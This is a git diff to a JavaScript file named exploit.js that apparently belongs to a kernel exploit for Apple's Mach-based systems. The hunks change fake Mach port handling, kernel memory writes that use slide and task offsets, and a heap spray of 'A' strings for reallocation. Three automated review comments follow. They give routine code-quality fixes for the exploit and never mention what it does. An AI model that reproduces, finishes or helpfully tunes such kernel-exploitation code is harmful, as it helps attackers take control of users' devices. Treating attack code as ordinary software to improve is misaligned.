Diffstat (limited to 'src')
| -rwxr-xr-x | src/js/kexp/exploit.js | 13 |
1 files changed, 5 insertions, 8 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index fbca86c..6f34aaf 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -496,11 +496,7 @@ again: while (true) { */ // var fake_port = mach_ports_lookup_shit(); printf("fuck\n"); - if (fake_port === 0 || fake_port === 0xffffffff) { - printf("fuck. fake port is fucked.\n"); - continue again; - } - scall("printf", "%x\n", fake_port); + printf("%x\n", fake_port); printf("fuck\n"); // todo: add mach_port_valid stuff printf("fuck\n"); @@ -508,8 +504,8 @@ again: while (true) { printf("fuck\n"); write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET); printf("fuck\n"); - write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET); -// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET); +// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET); + write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET); printf("fuck\n"); var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0"; printf("fuck\n"); @@ -527,7 +523,8 @@ again: while (true) { usleep(10000); sched_yield(); mach_port_destroy(mach_task_self(), read_u32(fakeportData)); - spray_data(tst, tst_str.length, 10, fakeportData); + ret__ = spray_data(tst, tst_str.length, 10, fakeportData); + printf("sd %d (%s)\n", ret__, mach_error_string(ret__)); printf("fuck\n"); printf("done realloc"); printf("fuck\n"); |
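Review bot: In the first hunk (`@@ -496,11 +496,7 @@`), `printf("%x\n", fake_port);` prints `fake_port` with no check on it, and the only assignment visible in the hunk, `// var fake_port = mach_ports_lookup_shit();`, is commented out, so whether the variable holds a current value depends on code outside the hunk. The removed guard was the only place in this hunk that handled the sentinel values `0` and `0xffffffff`; with it gone those values are printed and the iteration carries on. If that is intended, a comment such as `// fake_port is not validated here (see mach_port_valid todo)` would record it, and a labelled line like `printf("fake_port = 0x%x\n", fake_port);` would make the output identifiable among the surrounding marker prints.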
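Review bot: In the second hunk (`@@ -508,8 +504,8 @@`), `write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);` commits an unexplained literal in place of the computed value, and the previous statement survives only as commented-out code, the same toggle-by-comment pattern the removed `0x73707621` line used. Nothing on the line says the constant is a placeholder, so a reader cannot tell a deliberate test value from a leftover. A one-line comment above it, for example `// TEST ONLY: placeholder value, computed address disabled above`, or a named constant would make the intent explicit. The enclosing `again: while (true)` loop starts and ends outside the hunk.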
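Review bot: In the third hunk (`@@ -527,7 +523,8 @@`), `ret__ = spray_data(...)` assigns to `ret__` with no declaration visible in the hunk. Unless it is declared elsewhere in the file, this creates an implicit global in sloppy mode and throws a ReferenceError in strict mode; `var ret__ = spray_data(tst, tst_str.length, 10, fakeportData);` avoids both. The return value is also only logged, so a non-zero result is printed and execution still reaches `printf("done realloc");`, which reports completion regardless of the outcome.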
